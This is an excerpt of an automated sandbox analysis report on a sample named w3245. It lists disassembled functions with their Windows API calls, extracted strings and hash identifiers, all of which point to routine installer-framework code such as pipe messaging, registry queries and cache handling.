                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                              • API String ID: 3934441357-606776022
                                                                                                                                                              • Opcode ID: 68f66e0e56f6556416c30af178d09460b15ca4fbf7923e78341c0650c4c61594
                                                                                                                                                              • Instruction ID: 537aa7dfbacd0dfc1029c6cb2276fec1a598d8d899d76b710a818ea1cf2271bd
                                                                                                                                                              • Opcode Fuzzy Hash: 68f66e0e56f6556416c30af178d09460b15ca4fbf7923e78341c0650c4c61594
                                                                                                                                                              • Instruction Fuzzy Hash: 45119D72940129FBCB218F94DD09EDE7BB9EF40750F114066FD00B6350E7349E50D6A4
                                                                                                                                                              Function 007D4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • _memcpy_s.LIBCMT ref: 007D4693
                                                                                                                                                              • _memcpy_s.LIBCMT ref: 007D46A6
                                                                                                                                                              • _memcpy_s.LIBCMT ref: 007D46C1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                                              • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                                                              • API String ID: 886498622-766083570
                                                                                                                                                              • Opcode ID: 8f12d3fba594172a5c15e83f777bc8a56d3974ab3d5b918a3841e5a7fa881580
                                                                                                                                                              • Instruction ID: 3a4c5b5c159c92f7659eb580385a599fe80061f84e09116581a5f66369df031e
                                                                                                                                                              • Opcode Fuzzy Hash: 8f12d3fba594172a5c15e83f777bc8a56d3974ab3d5b918a3841e5a7fa881580
                                                                                                                                                              • Instruction Fuzzy Hash: A3115EB654420AABDB01AF94CC86DEB77ACEF05B10B00452AFA11DB251D779EA5487E0
                                                                                                                                                              Function 00803C72 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00803CC0
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00803CCA
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00803CFD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                              • String ID: <$PDu$shelutil.cpp
                                                                                                                                                              • API String ID: 3023784893-2418939910
                                                                                                                                                              • Opcode ID: 37c24001a408133d818796e1610947bc52bb293f3a8791981526ffd59e6d1467
                                                                                                                                                              • Instruction ID: e68097afd48246382962ee67d31d8265d1f2eba87528ee14280aaabb5652357e
                                                                                                                                                              • Opcode Fuzzy Hash: 37c24001a408133d818796e1610947bc52bb293f3a8791981526ffd59e6d1467
                                                                                                                                                              • Instruction Fuzzy Hash: A211D6B5E01229ABDB60DFA9D845A8EBBF8FB09750F104129FD15F7340E7349A10CBA4
                                                                                                                                                              Function 008096CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                              • API String ID: 0-1718035505
                                                                                                                                                              • Opcode ID: 673885c469736d8e89965df585ca86830cdb3aab97c3e573271feab98e0acd3f
                                                                                                                                                              • Instruction ID: f7e3830dab6110ededb414d1ce5fce41214a12e76dd3f6efac4d8ea878d7ab83
                                                                                                                                                              • Opcode Fuzzy Hash: 673885c469736d8e89965df585ca86830cdb3aab97c3e573271feab98e0acd3f
                                                                                                                                                              • Instruction Fuzzy Hash: FB01CD727533339BCFF00E656CD59972388F6223553108176E5F6D32C2EB52C8859690
                                                                                                                                                              Function 00800ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                              • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                              • API String ID: 4275029093-1586155540
                                                                                                                                                              • Opcode ID: fe10cb55d7944aa197612d7bfa73bcbf393535ed4318989356c7c4f3674705a1
                                                                                                                                                              • Instruction ID: 0de26994ebacd55d51896327459c26ed60987e66673caf4bd237286c0c62ab49
                                                                                                                                                              • Opcode Fuzzy Hash: fe10cb55d7944aa197612d7bfa73bcbf393535ed4318989356c7c4f3674705a1
                                                                                                                                                              • Instruction Fuzzy Hash: B5F0A472A4063AABC7609B959D19E9BBB68FB00B61F414154BD14E7380EB74DE00CBD0
                                                                                                                                                              Function 007FA20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F3479,007F3479,?,?,?,007FA45C,00000001,00000001,ECE85006), ref: 007FA265
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA45C,00000001,00000001,ECE85006,?,?,?), ref: 007FA2EB
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA3E5
                                                                                                                                                              • __freea.LIBCMT ref: 007FA3F2
                                                                                                                                                                • Part of subcall function 007F521A: HeapAlloc.KERNEL32(00000000,?,?,?,007F1F87,?,0000015D,?,?,?,?,007F33E0,000000FF,00000000,?,?), ref: 007F524C
                                                                                                                                                              • __freea.LIBCMT ref: 007FA3FB
                                                                                                                                                              • __freea.LIBCMT ref: 007FA420
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3147120248-0
                                                                                                                                                              • Opcode ID: ff9074bb2be8e519e98cc3b6d743757f1f264690143f104d694b887739d4b31e
                                                                                                                                                              • Instruction ID: 58d112fca8d63092f489ba1476458137419fc9af43d4bd423e353f20965e4830
                                                                                                                                                              • Opcode Fuzzy Hash: ff9074bb2be8e519e98cc3b6d743757f1f264690143f104d694b887739d4b31e
                                                                                                                                                              • Instruction Fuzzy Hash: B651E4B261021ABFDF298F68CC45EBF77A9EF44750F154629FE18D6240EB38DC809652
                                                                                                                                                              Function 007D9287 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 139COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D93C9
                                                                                                                                                                • Part of subcall function 008056CF: GetLastError.KERNEL32(?,?,007D933A,?,00000003,00000000,?), ref: 008056EE
                                                                                                                                                              Strings
                                                                                                                                                              • cache.cpp, xrefs: 007D93ED
                                                                                                                                                              • Failed to read certificate thumbprint., xrefs: 007D93BD
                                                                                                                                                              • yT|, xrefs: 007D9287
                                                                                                                                                              • Failed to get certificate public key identifier., xrefs: 007D93F7
                                                                                                                                                              • Failed to find expected public key in certificate chain., xrefs: 007D938A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                              • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp$yT|
                                                                                                                                                              • API String ID: 1452528299-295031655
                                                                                                                                                              • Opcode ID: 1fb315036a2e8ff2a4136e86f69cab2fd8c547c71a23e469572c28769275e4c5
                                                                                                                                                              • Instruction ID: 10f5af97777049aab627251bfd0cfc58fb1ea9b291a732b707c9abf014c7ec24
                                                                                                                                                              • Opcode Fuzzy Hash: 1fb315036a2e8ff2a4136e86f69cab2fd8c547c71a23e469572c28769275e4c5
                                                                                                                                                              • Instruction Fuzzy Hash: BF414272E04615EBDB10DBA9C845EAEB7B8BF08710F05416AFA15E7391D778ED40CBA0
                                                                                                                                                              Function 007D8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 007D8D18
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                                              • API String ID: 3472027048-398165853
                                                                                                                                                              • Opcode ID: 18ab38b27692faa8f7ed50cbec74d5cd18d58f45e28979450b83a0237589b536
                                                                                                                                                              • Instruction ID: 7ed0247189b2cc7f3a816b8447d66f0f9ec8f4af6900d012e97eefa331a7028f
                                                                                                                                                              • Opcode Fuzzy Hash: 18ab38b27692faa8f7ed50cbec74d5cd18d58f45e28979450b83a0237589b536
                                                                                                                                                              • Instruction Fuzzy Hash: 2231F472B40214BBEB626A548C46FBE667DEF28720F11402AFD04F63C1EA3D9D5056A6
                                                                                                                                                              Function 007DE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE985
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE994
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 007DE9A8
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007DE9B8
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 007DE9D2
                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 007DEA31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3812958022-0
                                                                                                                                                              • Opcode ID: dc8f573ed32a5b0293afd000b1ebb3f421912d1536b8a9b35d98b020101f7aae
                                                                                                                                                              • Instruction ID: 43bea82c8b8cd88fb3db70d602fede720a78eda7fa4356f9182f940a9229cfe7
                                                                                                                                                              • Opcode Fuzzy Hash: dc8f573ed32a5b0293afd000b1ebb3f421912d1536b8a9b35d98b020101f7aae
                                                                                                                                                              • Instruction Fuzzy Hash: 11219031104105BFDB16AFA8DC49E6A3BB6FF85310F158619FA0AAA3A4C735ED10DB51
                                                                                                                                                              Function 007DC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • elevation.cpp, xrefs: 007DC9B8
                                                                                                                                                              • Failed to save state., xrefs: 007DC891
                                                                                                                                                              • Unexpected elevated message sent to child process, msg: %u, xrefs: 007DC9C4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleMutexRelease
                                                                                                                                                              • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                              • API String ID: 4207627910-1576875097
                                                                                                                                                              • Opcode ID: 455539a68f5edb1b971b387a2ea33ca57e938129a620d6de0c293463d161865a
                                                                                                                                                              • Instruction ID: fbd8e6d627847ac6c90fbd831883533bce17a2e651df136ea53d807889a63155
                                                                                                                                                              • Opcode Fuzzy Hash: 455539a68f5edb1b971b387a2ea33ca57e938129a620d6de0c293463d161865a
                                                                                                                                                              • Instruction Fuzzy Hash: 7661C67A100515EFCB135F84CE05C55BBB2FF08314715C55AFAA99A632C736E821EF45
                                                                                                                                                              Function 00807B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C74
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C7F
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C8A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                              • String ID: `<u$atomutil.cpp
                                                                                                                                                              • API String ID: 2724874077-4051019476
                                                                                                                                                              • Opcode ID: 7275981dccb7dae40f4796a0d7f83cdccebca0dd4b17bd59d868ec1de666eb68
                                                                                                                                                              • Instruction ID: 79510d8c8e83dc8693d5a964c72668137ea544d8efd7a64a9a77f331ed29ac15
                                                                                                                                                              • Opcode Fuzzy Hash: 7275981dccb7dae40f4796a0d7f83cdccebca0dd4b17bd59d868ec1de666eb68
                                                                                                                                                              • Instruction Fuzzy Hash: 76514D71D0522AAFEB61DB64CC44FAEB7B9FF04710F154198E905EB291DB71AE40CBA0
                                                                                                                                                              Function 00801217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0080123F
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00801276
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0080136E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$lstrlen
                                                                                                                                                              • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                              • API String ID: 3790715954-1648651458
                                                                                                                                                              • Opcode ID: 8ef95f0efc8f3d8459537d57309d1446269868b3656aa9e9abe21e3922f5c73b
                                                                                                                                                              • Instruction ID: 20678b2a8a9222f05cb6dbb80f14aeff09de82ceb0ff2b397478fd7c1c49b72f
                                                                                                                                                              • Opcode Fuzzy Hash: 8ef95f0efc8f3d8459537d57309d1446269868b3656aa9e9abe21e3922f5c73b
                                                                                                                                                              • Instruction Fuzzy Hash: 22419F35A0021AEFDF61DF95CC89ABEB7A9FF44724F164169E901EB780D6349D009BA0
                                                                                                                                                              Function 00806357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0080490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 00804925
                                                                                                                                                                • Part of subcall function 0080490D: GetLastError.KERNEL32(?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 0080492F
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00805C09,?,?,?,?,?,?,?,00010000,?), ref: 008063C0
                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00805C09,?,?,?,?), ref: 00806412
                                                                                                                                                              • GetLastError.KERNEL32(?,00805C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00806458
                                                                                                                                                              • GetLastError.KERNEL32(?,00805C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0080647E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                              • String ID: dlutil.cpp
                                                                                                                                                              • API String ID: 133221148-2067379296
                                                                                                                                                              • Opcode ID: 75cefa16d2c39e8d97c7eee5dbedd6dc7f47226675597986f536c6ff26ea70eb
                                                                                                                                                              • Instruction ID: bdb008e0bfedaf848bda3b241840338e94631c47adcd1bfcca2a69ebe4fb65b0
                                                                                                                                                              • Opcode Fuzzy Hash: 75cefa16d2c39e8d97c7eee5dbedd6dc7f47226675597986f536c6ff26ea70eb
                                                                                                                                                              • Instruction Fuzzy Hash: 64419D7290062ABFEB618E94CD85BAA7B68FF04720F154225FD00E61E0E371DD70DBA5
                                                                                                                                                              Function 007C2428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,007FFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007FFFEF,007E12CF,?,00000000), ref: 007C246E
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007FFFEF,007E12CF,?,00000000,0000FDE9,?,007E12CF), ref: 007C247A
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 3662877508-3612885251
